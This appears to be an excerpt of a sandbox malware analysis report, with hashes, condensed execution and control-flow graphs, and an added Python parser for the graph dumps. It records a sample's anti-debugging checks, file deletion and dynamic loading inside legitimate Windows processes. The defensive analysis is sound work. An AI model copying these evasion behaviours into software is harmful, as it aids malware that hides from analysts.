                                                                          • Opcode Fuzzy Hash: f479dfa262346e44a5e99cca58182ae8353678a5d480ddf3a3a955f4abfef33a
                                                                          • Instruction Fuzzy Hash: BC61383061EBD95FD76ADB6888B59A47FF0EF5630470A01EAD08AC71A3DA18A906C341

                                                                          Execution Graph

                                                                          Execution Coverage: 12.1%
                                                                          Dynamic/Decrypted Code Coverage: 80%
                                                                          Signature Coverage: 12%
                                                                          Total number of Nodes: 25
                                                                          Total number of Limit Nodes: 4
                                                                          execution_graph (rendered graph not included; the node/edge dump is condensed here: 25 nodes, 31 edges). Root nodes: 10a0848, 66bfde2, 10a7ee0. 10a0848 -> 10a084e, which exits to 10a091b or continues 10a137f -> 10a1383 -> 10a14c0 (DeleteFileW) and 10ab6ff -> 10ab69b (DeleteFileW), or 10a14c0 -> 10a1396 -> 10a14c0 (DeleteFileW) and 10ab6ff (DeleteFileW). 66bfde2 -> 66bfc71 -> 66bfe78 (LoadLibraryExW) -> 66bfea9. 10a7ee0 -> 10a7f24 (CheckRemoteDebuggerPresent) -> 10a7f66.

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph not included; basic-block dump condensed). Function at 66bf7d8, basic blocks 66bf7d8 through 66bfecd. Block 66bfb61-66bfb64 branches back to 66bf7fa-66bf7fd and block 66bfb13-66bfb16 back to 66bf814-66bf81d (the function's loops). LoadLibraryExW is called in block 66bfe78-66bfea7; block 66bfcb5-66bfce4 makes an internal call to 66b9bf8.
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2930382102.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0723b451c9175eb2c81d1b1de37551f633482b98c8e0b4b081202e372767056c
                                                                          • Instruction ID: 31bb10d277fe66476f442c9f491ad1f4375d287575a3e1c9430ac0afc5cbd026
                                                                          • Opcode Fuzzy Hash: 0723b451c9175eb2c81d1b1de37551f633482b98c8e0b4b081202e372767056c
                                                                          • Instruction Fuzzy Hash: 8F12A234E00209DFDF64DF69D980BAEB7B2EB88314F109529E419E7365C735E886CB91

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph not included): three basic blocks. 10a7ee0-10a7f64 calls CheckRemoteDebuggerPresent and branches either to 10a7f66-10a7f6c or directly to 10a7f6d-10a7fa8; 10a7f66-10a7f6c falls through to 10a7f6d-10a7fa8.
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010A7F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 8c5f57235d5290fe818f06a0d6c7d16407faef762727504e96dd257f507f59c2
                                                                          • Instruction ID: 866f4794a5d0f3f500848afce961d0fba222289c3fbf5cc14b4f709dc9871a6e
                                                                          • Opcode Fuzzy Hash: 8c5f57235d5290fe818f06a0d6c7d16407faef762727504e96dd257f507f59c2
                                                                          • Instruction Fuzzy Hash: 252145B1800259CFCB10CF9AD484BEEBBF4AF49320F14846AE458A3250D738AA44CF64

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph not included; basic-block dump condensed). Routine at 10ab6ff, basic blocks 10ab69b through 10ab89f. Entry block 10ab6ff-10ab70d goes either to 10ab69b-10ab6cd, which calls DeleteFileW, or to 10ab70f-10ab724; block 10ab7ce-10ab7d1 branches back to 10ab726-10ab729 (loop); block 10ab7b7 makes an internal call to 10abcb0.
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010AB6C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID: LR^q
                                                                          • API String ID: 4033686569-2625958711
                                                                          • Opcode ID: 7d9307bd292b8521d4936315d9aba6bbfbce14239df40c62ed9f60a1ced3c8c3
                                                                          • Instruction ID: 02740b30c117ebf5ae83fe013d088cc0a8904c4a178f785ae3372db2f0be6ee7
                                                                          • Opcode Fuzzy Hash: 7d9307bd292b8521d4936315d9aba6bbfbce14239df40c62ed9f60a1ced3c8c3
                                                                          • Instruction Fuzzy Hash: 3A41CF30E006198FDB65CFA8C4447EEBBF1FF49310F548959E886EB251E7B4A942CB90

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph not included): three basic blocks. 10a7ed8-10a7f64 calls CheckRemoteDebuggerPresent and branches either to 10a7f66-10a7f6c or directly to 10a7f6d-10a7fa8; 10a7f66-10a7f6c falls through to 10a7f6d-10a7fa8.
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010A7F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 2f6c6f5f0242c6c6b65b7e59e809244b6b56820a621fe61fd1d911e23b66ca6e
                                                                          • Instruction ID: 2ebee09c1d686e565e1aaca785034c94cb7fa2bf0e247682b41cb6f9725fc7fa
                                                                          • Opcode Fuzzy Hash: 2f6c6f5f0242c6c6b65b7e59e809244b6b56820a621fe61fd1d911e23b66ca6e
                                                                          • Instruction Fuzzy Hash: C72148B1C01259CFCB14CFAAD484BEEBBF4EF49320F24846AE459A3251D738A944CF64

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph not included): five basic blocks. 10ab648-10ab69a goes to 10ab69c-10ab69f or directly to 10ab6a2-10ab6cd, which calls DeleteFileW; from there to 10ab6cf-10ab6d5 or 10ab6d6-10ab6fe; 10ab6cf-10ab6d5 falls through to 10ab6d6-10ab6fe.
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010AB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 5ba89544c8a84bd8acf9879c8aaf2b91363ff63876e1c5fb2161672811acbbd6
                                                                          • Instruction ID: cc1fb15c7c92460c9745d4a9a3b5253cd43e67c13b3be621e040867a57e80fca
                                                                          • Opcode Fuzzy Hash: 5ba89544c8a84bd8acf9879c8aaf2b91363ff63876e1c5fb2161672811acbbd6
                                                                          • Instruction Fuzzy Hash: DF2136B1D006598FDB14CF9AD5447EEFBF0BF48320F14816AD858A7250D738A940CFA5
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010AB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: b4af220e793b9a456f3c9375437f740e3972ec32b7b5c470e1a991c6369ecee2
                                                                          • Instruction ID: 3acaba1da30b885fd9ed24783c635d414b47064a2f4fd9ac35cff8625cec1d3d
                                                                          • Opcode Fuzzy Hash: b4af220e793b9a456f3c9375437f740e3972ec32b7b5c470e1a991c6369ecee2
                                                                          • Instruction Fuzzy Hash: 101133B1D0061A9BCB14CF9AC544B9EFBF4FF48320F10816AD858A7250D738A940CFA5
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2870471873.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_d5d000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 917d9fda79aea05038528857c9647f5e1f931535f198d8df651be8de1a3ae0de
                                                                          • Instruction ID: 799acf0d80a69352c0ded79a97b80837701f5a9e51876daf637f7580cb70113d
                                                                          • Opcode Fuzzy Hash: 917d9fda79aea05038528857c9647f5e1f931535f198d8df651be8de1a3ae0de
                                                                          • Instruction Fuzzy Hash: EA311A7550E3C08FDB138B24C9A4711BF71AB47214F1985DBD8898F2A7C22A980ECB72
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2870471873.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_d5d000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dcc1cee6433e21c30ab9b3d4fc4fa6f38543be9753cb15a96bccd28095cb3dbd
                                                                          • Instruction ID: d274a194506bb3bb8cb8482f78b1bec27d1d53b2ea52c6ec78da0c962e71a664
                                                                          • Opcode Fuzzy Hash: dcc1cee6433e21c30ab9b3d4fc4fa6f38543be9753cb15a96bccd28095cb3dbd
                                                                          • Instruction Fuzzy Hash: 4121F271504204DFCF24DF28C9C4B26BBA6FB84315F24C569EC494B292C73AD84ACA71

                                                                          Execution Graph

                                                                          Execution Coverage: 13.1%
                                                                          Dynamic/Decrypted Code Coverage: 83.1%
                                                                          Signature Coverage: 0%
                                                                          Total number of Nodes: 89
                                                                          Total number of Limit Nodes: 10
                                                                          execution_graph (rendered graph not included; the node/edge dump is condensed here). Root nodes: f37ee0 and f30848. f37ee0 -> f37f24 (CheckRemoteDebuggerPresent) -> f37f66. f30848 -> f3084e, which exits to f3091b or continues f3137f -> f31383, which fans out to f3b4e2, f3b368, f3b541, f3b4a4, f3b378, f3b6ff and f3b710. The first five reach DeleteFileW through f3b5f0/f3b5e0 -> f3b600 -> f3ae6c -> f3b650 (call sites f3b650 and f3ae6c). f3b6ff/f3b710 go through f3c0c8/f3c0b8 -> f3d9b3/f3d910/f3d901 (several of these nodes are summarised only as '3 API calls') -> f3d988/f3d92d -> 66bf7c8/66bf7d8/66bfb80, which call LoadLibraryExW at 66bfe78 -> 66bfea9.
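                                                                          The execution_graph and control_flow_graph dumps on this page (the two execution graphs and the basic-block listings between them) are Graphviz-style node/edge lists flattened into a single line. The parser below is an added example written for this page, not part of the Joe Sandbox report or its tooling; it recovers nodes, edges, root nodes, API call sites and intra-module calls from such a dump. The token grammar (decimal node id, hex address or address range, free-text label words, id->id edges, 'call <addr>' for internal calls, 'N API calls' as a summary) is inferred from the dumps on this page. EXEC_SAMPLE is the first execution graph of this report copied verbatim and CFG_SAMPLE is its CheckRemoteDebuggerPresent control-flow graph; CFG_CALL_SAMPLE is constructed from three blocks of the 66bf7d8 graph with an invented 2064->2050 edge.

```python
"""Recover nodes, edges and API call sites from a Joe Sandbox graph dump
(execution_graph / control_flow_graph) flattened into one line of text.

Added example; the grammar is inferred from the dumps on this page:
  '<id> <hexaddr>[-<hexaddr>] <label words...>'  declares a node
  '<id>-><id>'                                    declares an edge
Labels carry API names, 'call <addr>' (intra-module call) or 'N API calls'.
"""
import re
from collections import defaultdict

NODE_ID = re.compile(r"^\d+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDRESS = re.compile(r"^[0-9a-fA-F]+(-[0-9a-fA-F]+)?$")
IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
LABEL_NOISE = {"call", "API", "calls"}  # label words that are not API names


def parse_graph(text):
    """Return {'kind', 'nodes': {id: {'id','start','end','label'}}, 'edges': [(src, dst)]}."""
    tokens = text.split()
    if not tokens or tokens[0] not in ("execution_graph", "control_flow_graph"):
        raise ValueError("expected a dump starting with execution_graph or control_flow_graph")
    graph = {"kind": tokens[0], "nodes": {}, "edges": []}
    current = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            graph["edges"].append((int(edge.group(1)), int(edge.group(2))))
            i += 1
            continue
        # A decimal id followed by an address (or address range) opens a new node.
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDRESS.match(tokens[i + 1]):
            start, _, end = tokens[i + 1].lower().partition("-")
            current = {"id": int(tok), "start": start, "end": end or start, "label": []}
            graph["nodes"][current["id"]] = current
            i += 2
            continue
        if current is None:
            raise ValueError(f"label word {tok!r} before any node")
        current["label"].append(tok)  # API name, 'call', call target or summary text
        i += 1
    return graph


def api_call_sites(graph):
    """Map API name -> sorted start addresses of the nodes whose label names it."""
    sites = defaultdict(set)
    for node in graph["nodes"].values():
        label = node["label"]
        for pos, word in enumerate(label):
            if word in LABEL_NOISE or not IDENTIFIER.match(word):
                continue
            if pos > 0 and label[pos - 1] == "call":
                continue  # 'call <addr>': intra-module target, not an API
            sites[word].add(node["start"])
    return {api: sorted(addrs) for api, addrs in sorted(sites.items())}


def internal_calls(graph):
    """Sorted (block start, callee address) pairs taken from 'call <addr>' labels."""
    calls = []
    for node in graph["nodes"].values():
        label = node["label"]
        for pos in range(len(label) - 1):
            if label[pos] == "call":
                calls.append((node["start"], label[pos + 1].lower()))
    return sorted(calls)


def roots(graph):
    """Start addresses of nodes with no incoming edge, in node-id order."""
    targets = {dst for _, dst in graph["edges"]}
    return [graph["nodes"][nid]["start"] for nid in sorted(graph["nodes"]) if nid not in targets]


def summarize(graph):
    return {"kind": graph["kind"], "nodes": len(graph["nodes"]), "edges": len(graph["edges"]),
            "roots": roots(graph), "api_call_sites": api_call_sites(graph),
            "internal_calls": internal_calls(graph)}


# Copied verbatim from the first execution_graph dump on this page.
EXEC_SAMPLE = (
    "execution_graph 25454 10a0848 25455 10a084e 25454->25455 25456 10a091b 25455->25456 "
    "25459 10a137f 25455->25459 25465 10a14c0 25455->25465 25460 10a1383 25459->25460 "
    "25462 10a1310 25459->25462 25461 10a14ba 25460->25461 25464 10a14c0 DeleteFileW 25460->25464 "
    "25470 10ab6ff 25460->25470 25461->25455 25462->25455 25464->25460 25466 10a1396 25465->25466 "
    "25467 10a14ba 25465->25467 25466->25467 25468 10a14c0 DeleteFileW 25466->25468 "
    "25469 10ab6ff DeleteFileW 25466->25469 25467->25455 25468->25466 25469->25466 "
    "25471 10ab69b DeleteFileW 25470->25471 25474 10ab70f 25470->25474 25473 10ab6cf 25471->25473 "
    "25473->25460 25474->25460 25475 66bfde2 25479 66bfc71 25475->25479 25476 66bfe0b "
    "25477 66bfe78 LoadLibraryExW 25478 66bfea9 25477->25478 25479->25476 25479->25477 "
    "25480 10a7ee0 25481 10a7f24 CheckRemoteDebuggerPresent 25480->25481 25482 10a7f66 25481->25482")
# The CheckRemoteDebuggerPresent control-flow graph from this page.
CFG_SAMPLE = ("control_flow_graph 2282 10a7ee0-10a7f64 CheckRemoteDebuggerPresent "
              "2284 10a7f6d-10a7fa8 2282->2284 2285 10a7f66-10a7f6c 2282->2285 2285->2284")
# Constructed: three blocks lifted from the 66bf7d8 graph; the 2064->2050 edge is invented.
CFG_CALL_SAMPLE = ("control_flow_graph 2060 66bfca6-66bfcaf 2064 66bfcb5-66bfce4 call 66b9bf8 "
                   "2060->2064 2050 66bfe78-66bfea7 LoadLibraryExW 2064->2050")

if __name__ == "__main__":
    for sample in (EXEC_SAMPLE, CFG_SAMPLE, CFG_CALL_SAMPLE):
        print(summarize(parse_graph(sample)))
```

Run against the first execution graph, summarize() reports 25 nodes (matching the "Total number of Nodes" header), three root nodes (10a0848, 66bfde2, 10a7ee0) and the three APIs the graph touches: DeleteFileW, LoadLibraryExW and CheckRemoteDebuggerPresent, each with the node addresses that call it. The noise words are needed because nodes that Joe Sandbox truncates are labelled only "3 API calls", which would otherwise be mistaken for API names.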

                                                                          Control-flow Graph

                                                                          control_flow_graph (rendered graph not included; basic-block dump condensed). Function at 66bf7d8, basic blocks 66bf7d8 through 66bfecd (the same code as the InstallUtil 66b0000 listing above). Block 66bfb61-66bfb64 branches back to 66bf7fa-66bf7fd and block 66bfb13-66bfb16 back to 66bf814-66bf81d (the function's loops). LoadLibraryExW is called in block 66bfe78-66bfea7; block 66bfcb5-66bfce4 makes an internal call to 66b9bf8.
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2937218045.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_66b0000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at f37ed8-f37fa8, which calls CheckRemoteDebuggerPresent
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00F37F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at f37ee0-f37fa8, which calls CheckRemoteDebuggerPresent
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00F37F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at f3ae6c-f3b6fe, which calls DeleteFileW
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 00F3B6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at f3b648-f3b6fe, which calls DeleteFileW
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 00F3B6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2874840637.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_f30000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2869951510.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_b9d000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2869951510.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_b9d000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Execution Graph

                                                                          Execution Coverage:10%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:6
                                                                          Total number of Limit Nodes:0
                                                                          Execution graph: FreeConsole is called from 7ffd9b870a1b and VirtualProtect from 7ffd9b8747d1

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at 7ffd9b873740-7ffd9b874968, which calls VirtualProtect
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at 7ffd9b8747a6-7ffd9b874968, which calls VirtualProtect
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at 7ffd9b885d7a-7ffd9b889c5d, which calls VirtualProtect
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at 7ffd9b870a0d-7ffd9b870b2d, which calls FreeConsole
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at 7ffd9b8704ba-7ffd9b870b2d, which calls FreeConsole
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1974901019.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b870000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleFree
                                                                          • String ID:
                                                                          • API String ID: 771614528-0

                                                                          Control-flow Graph

                                                                          Control-flow graph for the function at 7ffd9b940d95-7ffd9b940e26 (no API calls)
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1975721581.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b940000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ")B,
                                                                          • API String ID: 0-3967059106
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1975721581.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b940000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 0000001B.00000002.1975721581.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_27_2_7ffd9b940000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Execution Graph

                                                                          Execution Coverage:11.1%
                                                                          Dynamic/Decrypted Code Coverage:54.5%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:11
                                                                          Total number of Limit Nodes:1
                                                                          Execution graph: LoadLibraryExW is called from 6aafe78, DeleteFileW from 109b696 and CheckRemoteDebuggerPresent from 1097f24

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
control_flow_graph (rendered graph text, summarized): function entered at 6aaf7d8. Block 6aafe78-6aafea7 calls LoadLibraryExW; block 6aafcb5-6aafce4 calls the sub-function at 6aa9bf8. No other API calls appear in this graph.
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2938814555.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_6aa0000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28b410ac54b2095de045456466780910b25d83868fe8c13fafab2eec074f0152
                                                                          • Instruction ID: 012803190bf2c53dfcf1f6822051701dd12d34f00ba087096f4e57c39e83f55b
                                                                          • Opcode Fuzzy Hash: 28b410ac54b2095de045456466780910b25d83868fe8c13fafab2eec074f0152
                                                                          • Instruction Fuzzy Hash: 88129234E002059FDF64EF69D980BAEB7B2EB88314F10852AD409EB355DB35EC46CB91

Control-flow Graph

control_flow_graph (rendered graph text, summarized): function entered at 1097ed8, three blocks. Block 1097ed8-1097f64 calls CheckRemoteDebuggerPresent and branches to either 1097f66-1097f6c or 1097f6d-1097fa8; 1097f66-1097f6c continues to 1097f6d-1097fa8.
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01097F57
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: fd15156f32e3dc2894e455c63db10319596e6004cacb82e83d279d9e45b9122e
                                                                          • Instruction ID: 2f091de8776e598950a4d90ff8f6100c2684ec81debd79ad697765d1fac36804
                                                                          • Opcode Fuzzy Hash: fd15156f32e3dc2894e455c63db10319596e6004cacb82e83d279d9e45b9122e
                                                                          • Instruction Fuzzy Hash: F52139B2800259CFCB10CFAAD484BEEBBF4AF48310F24846AE459B7251C7389944CF65

Control-flow Graph

control_flow_graph (rendered graph text, summarized): same function as above with a second entry at 1097ee0, three blocks. Block 1097ee0-1097f64 calls CheckRemoteDebuggerPresent and branches to either 1097f66-1097f6c or 1097f6d-1097fa8; 1097f66-1097f6c continues to 1097f6d-1097fa8.
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01097F57
                                                                          Memory Dump Source
                                                                          • Source File: 00000025.00000002.2876276275.0000000001090000.00000040.00000800.00020000.00000000.sdmp, Offset: 01090000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_37_2_1090000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: d46bfb245d6c8616cc8e0c47ebf0a8897e149a57a87e2f8db7d75be4cd6c2e9c
                                                                          • Instruction ID: 26f49d1d4f353d519edfa9130dcfc4762e9e461d09000694f63d6d1d000b88e5
                                                                          • Opcode Fuzzy Hash: d46bfb245d6c8616cc8e0c47ebf0a8897e149a57a87e2f8db7d75be4cd6c2e9c
                                                                          • Instruction Fuzzy Hash: 3C2125B2800259CFCB14CF9AD484BEEBBF4AF49320F14846AE459B7250D778A944CF65

Control-flow Graph

control_flow_graph (rendered graph text, summarized): function entered at 109b648, five blocks. Block 109b648-109b69a branches to 109b69c-109b69f or directly to 109b6a2-109b6cd; 109b69c-109b69f continues to 109b6a2-109b6cd, which calls DeleteFileW and branches to 109b6cf-109b6d5 or 109b6d6-109b6fe; 109b6cf-109b6d5 continues to 109b6d6-109b6fe.
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 0109B6C0
                                                                          Memory Dump Source
